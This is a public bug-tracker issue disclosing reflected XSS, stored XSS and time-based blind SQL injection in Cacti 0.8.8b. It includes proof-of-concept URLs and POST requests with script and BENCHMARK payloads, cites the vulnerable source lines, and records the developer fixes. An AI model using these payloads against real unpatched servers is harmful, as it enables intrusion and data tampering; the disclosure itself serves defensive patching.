Mantis Bugtracker

Viewing Issue Advanced Details Jump to Notes ] View Simple ] Issue History ] Print ]
ID Category Severity Reproducibility Date Submitted Last Update
0002383 [Cacti] Security major always 2013-08-12 23:06 2013-08-24 12:25
Reporter xistence View Status public  
Assigned To gandalf
Priority normal Resolution fixed Platform
Status resolved   OS
Projection none   OS Version
ETA none Fixed in Version Product Version 0.8.8a
  Target Version Product Build
Summary 0002383: Multiple vulnerabilities in Cacti 0.8.8b and lower
Description The following are XSS and SQL Injection vulnerabilities I've found in the latest version of Cacti (0.8.8b), but are also in lower versions.

[ Reflected XSS ]

There is a reflected Cross Site Scripting vulnerability in the "step" parameter of the "/install/index.php" script.
http://<IP>/cacti/install/index.php?x=52&y=21&step="><script>alert(12345)</script> [^]


[ Stored XSS ]

The "/cacti/host.php" script is vulnerable to a stored Cross Site Scripting vulnerability in the "id" parameter.

Send the following POST request.

POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

id=<script>alert(12345)</script>&save_component_host=1&action=save

Now browse to http://<IP>/cacti/utilities.php?tail_lines=500&message_type=-1&go=Go&refresh=60&reverse=1&filter=12345&page=1&action=view_logfile [^] and you'll see a popup with the text "12345".


[ Blind SQL Injection ]

The "/cacti/host.php" script is vulnerable to Blind SQL Injection in the "id" parameter. The proof of concept below will send a query to the backend MySQL which will calculate the MD5 hash for "1" 1000000 times and thus cause a delay before finishing the query.

POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

id=-1 AND BENCHMARK(1000000,MD5(1))&save_component_host=1&action=save



The SQLi vulnerability is in the host.php which doesn't sanitize the $id parameter when providing it to the api_device_save() function in lib/api_device.php

host.php:

152: $host_id = api_device_save($_POST["id"], $_POST["host_template_id"], $_POST["description"],

lib/api_device.php:

94: function api_device_save($id, $host_template_id, $description, $hostname, $snmp_community, $snmp_version,

[..SNIP..]

103: /* fetch some cache variables */
104: if (empty($id)) {
105: $_host_template_id = 0;
106: }else{
107: $_host_template_id = db_fetch_cell("select host_template_id from host where id=$id");
108: }


The changes below in "host.php" will fix this:

148: if ((isset($_POST["save_component_host"])) && (empty($_POST["add_dq_x"]))) {
149:+ /* ================= input validation ================= */
150:+ input_validate_input_number(get_request_var_post("id"));
151:+ /* ==================================================== */
152: if ($_POST["snmp_version"] == 3 && ($_POST["snmp_password"] != $_POST["snmp_password_confirm"])) {
Steps To Reproduce
Additional Information
Tags No tags attached.
Attached Files ? file icon fix_cross_site_scripting_in_install.patch [^] (445 bytes) 2013-08-24 10:04 [Show Content]

- Relationships

-  Notes
(0006503)
paulgevers (reporter)
2013-08-24 07:14

I guess that an alternative would be to sanitize the id in
lib/api_device.php on line 110.

And also it seems that sanitizing id can already be done at the start of save_form (i.e. on line 119).
(0006504)
paulgevers (reporter)
2013-08-24 09:31

Hmm, if you go for lib/api_device.php, that line in my previous comment should of course have been BOTH 107 and 110, as I think line 107 is the line actually executing the offending injection.
(0006505)
paulgevers (reporter)
2013-08-24 10:04

Please find attached a patch for the Reflected XSS issue.
(0006506)
gandalf (developer)
2013-08-24 12:23

r7420 (for 088) and r7421 (for 089) sanitize step and id
(0006507)
gandalf (developer)
2013-08-24 12:25

fixed in 088 and 089

- Issue History
Date Modified Username Field Change
2013-08-12 23:06 xistence New Issue
2013-08-24 07:14 paulgevers Note Added: 0006503
2013-08-24 09:31 paulgevers Note Added: 0006504
2013-08-24 10:04 paulgevers File Added: fix_cross_site_scripting_in_install.patch
2013-08-24 10:04 paulgevers Note Added: 0006505
2013-08-24 12:23 gandalf Note Added: 0006506
2013-08-24 12:25 gandalf Status new => assigned
2013-08-24 12:25 gandalf Assigned To => gandalf
2013-08-24 12:25 gandalf Note Added: 0006507
2013-08-24 12:25 gandalf Status assigned => resolved
2013-08-24 12:25 gandalf Resolution open => fixed


Mantis 1.1.6[^]
Copyright © 2000 - 2008 Mantis Group
Powered by Mantis Bugtracker